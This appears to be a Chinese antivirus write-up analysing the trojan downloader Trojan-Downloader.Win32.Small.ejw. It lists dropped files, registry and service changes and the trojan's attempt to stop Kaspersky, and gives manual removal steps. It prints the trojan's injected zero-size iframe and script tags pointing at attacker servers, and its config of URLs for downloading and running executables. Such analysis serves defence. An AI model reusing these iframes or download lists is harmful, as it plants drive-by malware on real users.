Trojan-Downloader.Win32.Small.ejw

檔案 MD5： 216221B8289779DAAB7405089391684F

檔案長度： 19,788 位元組

感染系統： windows98以上版本

開發工具： Microsoft Visual C++ 6.0

加殼類型： Xtreme-Protector v1.05

1 、衍生病毒檔案到系統目錄下：

%system32%\d26bf5b8.dll

%system32%\d26bf5b8.exe

%system32%\d26bf5b8t.exe

2 、修改註冊表：

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\D26BF5B8\ImagePath

值 : 字元串: "C:\WINDOWS\system32\D26BF5B8.EXE -service"

3 、開啟服務：

服務名稱： D26BF5B8

顯示名稱： D26BF5B8

描述： D26BF5B8

執行檔的路徑： C:\WINDOWS\system32\D26BF5B8.EXE

啟動方式：自動

4 、關閉系統正常服務 ERSVC：

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ERSvc

鍵值 : 字串: "Description"="服務和應用程式在非標準環境下運行時允許錯誤報告"

5 、連線網路：

＜script language="javascript"

src="http://count6.51yes.com/click.aspx?id=63610940&logo=1"＞＜/script＞

＜iframe height="0" width="0"

src="http://59.34.197.164:81/808080/ad2881.asp"＞＜/iframe＞

＜iframe height="0" width="0"

src="http://59.34.197.164:81/80444/ad2715fg.asp"＞＜/iframe＞

＜iframe height="0" width="0" src="http://www.sxrf.gov.cn"＞＜/iframe＞

＜iframe height="0" width="0"

src="http://59.34.197.164:81/88888/ad56d.asp"＞＜/iframe＞

＜iframe height="0" width="0" src="http://www.gansusteel.com"＞＜/iframe＞

＜iframe height="0" width="0" src="http://www.east128.com/about.asp"＞＜/iframe＞

＜iframe height="0" width="0" src="http://dongman.0937.net"＞＜/iframe＞

＜iframe height="0" width="0" src="http://suremo.cn"＞＜/iframe＞

＜iframe height="0" width="0" src="http://www.jkdj.cn"＞＜/iframe＞

＜iframe height="0" width="0" src="http://www.cnkmd.com"＞＜/iframe＞

＜iframe height="0" width="0" src="http://www.xinwanyu.com"＞＜/iframe＞

＜iframe height="0" width="0" src="http://hejianwu.com"＞＜/iframe＞

＜iframe height="0" width="0" src="http://59.34.197.164:81/80465551/ad28781.asp"＞

/iframe＞

＜iframe height="0" width="0"

src="http://59.34.197.164:81/808080/ad2881.asp"＞＜/iframe＞

＜iframe src='http://59.34.197.239/in.asp?newwebname=1' width='0' height='0'

frameborder='0'＞＜/iframe＞

＜script language="javascript" src="http://59.34.197.239/in.js"＞＜/script＞

6 、該木馬有盜取用戶敏感信息的功能，連線網路，下載病毒檔案到本機運行：

[update]

ver=0

url=http://127.0.0.1/

timer=1

[startpage]

startpage=0

url=http://www.sina.com.cn1

[favorites]

favorites=0

count=0

[desktop]

desktop=0

count=0

[popwin]

popwin=0

count=0

[addrpop]

addrpop=0

[alexa]

alexa=1

fileurl=http://www.al*x*.com/1.exe

url1=http://nba.9*6*k.com/2.htm

url2=http://5*.3*.1*7.1*4:81/808080/ad2881.asp

rl3=http://5*.3*.1*7.1*4:81/80444/ad2715fg.asp

url4=http://5*.3*.1*7.1*4:81/8046338888/ad285367.asp

url5=http://5*.3*.1*7.1*4:81/8046555/ad2878.asp

url6=http://5*.3*.1*7.1*4:81/80444/ad2715.asp

url7=http://www.u**s*e.com/top.html

url8=http://www.it*o*ns.com

url9=http://www.j*d*.cn

url10=http://www.*x*f.gov.cn

url11=http://www.g*ns*st*el.com

url12=http://5*.3*.1*7.1*4:81/88888/ad56d.asp

url13=http://www.y*h*l*ng.com

url14=http://5*.3*.1*7.1*4:81/8046222/ad2714.asp

url15=http://5*.3*.1*7.1*4:81/80465551/ad28781.asp

count=15

[im]

im=0

msg= 你好啊，兄弟！ http://www.s*n*.com.cn

qq=0

popo=0

uc=0

taobao=0

[file]

file=1

file1=http://www.t*o1*81*8.com/mh.exe

filename1=sthu1.exe

file2=http://h&inf*lm.cn/obug.exe

filename2=sthu2.exe

file3=http://www.t*o1*81*8.com/qq.exe

filename3=sthu3.exe

file4=http://imgbbs.sh*ngd*.com/bbs.shangdu.com/3/227/464355/file/gz.exe

filename4=sthu4.exe

file5=http://www.t*o1*81*8.com/12.exe

filename5=sthu5.exe

file6=http://www.y*-m*ng.com/bbs/geawe/fsgd/treter/1.exe

filename6=sthu6.exe

file7=http://www.t*o1*81*8.com/yk.exe

filename7=sthu7.exe

file8=http://jd.54l*um*ng.com/lm/one.exe

filename8=sthu8.exe

count=8

[count]

count=1

mecount=1

url=http://nba.9*6*k.com/lm/count/count.asp

7 、該病毒嘗試關閉卡巴斯基進程。

註： % System%是一個可變路徑。病毒通過查詢作業系統來決定當前System資料夾的位置。Windows2000/NT中默認的安裝路徑是C:\Winnt\System32，windows95/98/me中默認的安裝路徑是C:\Windows\System，windowsXP中默認的安裝路徑是C:\Windows\System32。

1 、 使用安天木馬防線可徹底清除此病毒 ( 推薦 )

2 、 手工清除請按照行為分析刪除對應檔案，恢復相關係統設定。

(1) 使用 安天木馬防線 “進程管理”關閉病毒進程

終止所有IE進程

(2) 刪除病毒檔案

%system32%\d26bf5b8.dll

%system32%\d26bf5b8.exe

%system32%\d26bf5b8t.exe

(3) 恢復病毒修改的註冊表項目，刪除病毒添加的註冊表項

D26BF5B8